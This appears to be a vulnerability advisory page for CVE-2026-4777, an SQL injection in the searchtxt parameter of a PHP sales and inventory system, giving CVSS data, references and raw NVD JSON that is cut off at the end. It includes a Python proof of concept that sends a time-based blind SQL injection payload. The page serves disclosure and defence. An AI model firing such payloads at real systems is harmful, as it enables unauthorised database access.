CVE-2026-4777

Description

A security flaw has been discovered in SourceCodester Sales and Inventory System 1.0. This affects an unknown part of the file view_supplier.php of the component POST Parameter Handler. The manipulation of the argument searchtxt results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:ahsanriaz26gmailcom:sales_and_inventory_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Sales and Inventory System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_sqli_vuln(target_url):
    """
    PoC for CVE-2026-4777 SQL Injection in SourceCodester Sales and Inventory System 1.0
    Vulnerable Parameter: POST 'searchtxt' in view_supplier.php
    """
    full_url = f"{target_url}/view_supplier.php"
    
    # Payload to test for time-based blind SQL injection
    # Assuming MySQL backend, SLEEP(5) will delay response if vulnerable
    payload = {
        "searchtxt": "' AND (SELECT SLEEP(5))-- -"
    }

    try:
        print(f"Sending request to {full_url}...")
        response = requests.post(full_url, data=payload, timeout=10)
        
        # If response time is greater than 5 seconds (plus network latency), it indicates vulnerability
        if response.elapsed.total_seconds() > 5:
            print("[+] Vulnerability Confirmed! SQL Injection detected.")
            print(f"    Response time: {response.elapsed.total_seconds()} seconds")
        else:
            print("[-] Vulnerability not detected or payload incorrect.")
            print(f"    Response time: {response.elapsed.total_seconds()} seconds")
            
    except requests.exceptions.RequestException as e:
        print(f"Error connecting to target: {e}")

if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost/sales_inventory"
    check_sqli_vuln(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4777
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4777
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4777/
[4] VulDB https://vuldb.com/cve/CVE-2026-4777
[5] https://github.com/meifukun/Web-Security-PoCs/blob/main/Inventory-System/SQLi-ViewSupplier-searchtxt.md
[6] https://vuldb.com/?ctiid.352795
[7] https://vuldb.com/?id.352795
[8] https://vuldb.com/?submit.775169
[9] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4777", "sourceIdentifier": "[email protected]", "published": "2026-03-24T22:16:24.187", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SourceCodester Sales and Inventory System 1.0. This affects an unknown part of the file view_supplier.php of the component POST Parameter Handler. The manipulation of the argument searchtxt results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks."}, {"lang": "es", "value": "Se ha descubierto una vulnerabilidad de seguridad en SourceCodester Sales and Inventory System 1.0. Esto afecta una parte desconocida del archivo view_supplier.php del componente Gestor de Parámetros POST. La manipulación del argumento searchtxt resulta en inyección SQL. El ataque puede lanzarse de forma remota. El exploit ha sido publicado y puede ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ahsanriaz26gmailcom:sales_and_inventory_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5A75B7A5-65D7-4AF9-BDE8-EBD496A4942B"}]}]}], "references": [{"url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Inventory-System/SQLi-ViewSupplier-searchtxt.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.352795", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.352795", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, ... (truncated)